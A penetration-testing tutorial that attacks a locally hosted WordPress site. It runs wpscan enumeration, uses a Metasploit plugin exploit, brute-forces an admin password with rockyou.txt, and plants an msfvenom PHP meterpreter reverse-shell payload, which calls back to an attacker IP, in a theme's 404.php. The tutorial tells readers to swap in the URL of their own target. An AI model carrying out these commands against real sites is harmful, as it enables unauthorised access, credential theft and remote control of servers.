Wordpress penetration testing
In this article we will see how we can enumerate a wordpress website and how we can find login credentials of a particular website . In this tutorial we will use wpscan tool available in Kali Linux OS.
Table of Content :
Introduction to WPscan
Normal Scan
Enumerating plugins
Enumerating vulnerable plugins
Enumerating themes
Enumerating vulnerable themes
Getting a session using metasploit
Enumerating users and finding credentials
Uploading a file to get reverse shell
Uploading a payload
Introduction to WPscan
use this link to get the latest version git clone https://github.com/wpscanteam/wpscan.git then change directory to wpscan using cd command and then go to bin directory and from there we will execute wpscan

this tool performs black box testing to find vulnerable wordpress themes ,plugins and version.
Normal Scan
In this section will try to find the wordpress version by using a simple command.
We have detected the Wordpress version successfully. Command used :
./wpscan --url http://127.0.0.1
Please change the URL of the targeted website. As I am hosting a wordpress website on my local machine so i have used this URL

Enumerating plugins
Plugins are a small piece of code of a program which can be added to a WordPress website to extend its functionality.
With the help of command : ./wpscan --url http://127.0.0.1 --enumerate p
we can easily find installed plugins on the target wordpress website, as shown in the image

Enumerating vulnerable plugins
In this case only a single plugin is present so not a problem and this can be vulnerable. But if we detect so many plugins then by running the command
./wpscan --url http://127.0.0.1 --enumerate vp
we can detect vulnerable plugins installed in the wordpress website.

Enumerating themes
theme controls overall look of the website like font ,font color,font size and other things.
Now in the same fashion we can detect Wordpress themes installed . command used:
./wpscan --url http://127.0.0.1 --enumerate t

Enumerating vulnerable themes
To scan the installed vulnerable theme of WordPress website type following command: ./wpscan --url http://127.0.0.1 --enumerate vt

No vulnerable themes find.
Getting a session using meteasploit
We have detected a vulnerable plugin so after searching in the metasploit we found a exploit for the vulnerable plugin and we will use that exploit to get a session.
exploit used : exploit/unix/webapp/wp_reflexgallery_file_upload


We can see that we have successfully opened a meterpreter session
Enumerating users and finding credentials
There is a page in wordpress website to login into the panel of website ,from there we can control the complete website and it is http://127.0.0.1/wp-login.php

Now to login into the main panel we need username and password and for that we need to find username . To find username we will use the command:
./wpscan --u http://127.0.0.1 --enumerate u

there exists a user with username haclabs . So its time to find the password for this user "haclabs" and for that we will use bruteforce approach by using the list /usr/share/wordlists/rockyou.txt
command used : ./wpscan --url http://127.0.0.1 -P /usr/share/wordlists/rockyou.txt -U haclabs

username : haclabs
password : 987654321
Done!! we have now user credentials and we can use them to login into the main panel of the website.
Uploading a file to get reverse shell
In this section we are going to create a malicious php file that will give us the shell when executed on the website . let's create the file first using msfvenom
command used: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.9 lport=4444 -f raw
where lhost is the IP of your kali linux machine (attacker machine) and lport is the port to listen on.

Now copy the highlighted part. now we go the page http://127.0.0.1/wp-login.php to login into the panel by using the credentials we have found earlier.

we can see that after using these credentials we logged in successfully .

Now go to Appearance -> Theme Editor->select theme to edit then select the theme which is active currently and then go to 404 template to edit the file 404.php and paste the malicious code there.

click on update and file.now we will open metasploit to get the session first of all let's setup all the things and then we will execute this theme by using the link : http://127.0.0.1/wp-content/themes/online-portfolio/404.php
in this case activated theme is online-portfolio ,so please change it with the name of currently active theme if active theme is different from this otherwise everything will remain as it is.

we succeed in getting a meterpreter session!
Uploading a payload
we know the credentials of user haclabs so here we are going to upload a payload to get the meterpreter session by using the exploit : exploit/unix/webapp/wp_admin_shell_upload

and exploit!! we have a meterpreter session!!!

So this was all about wordpress penetration testing.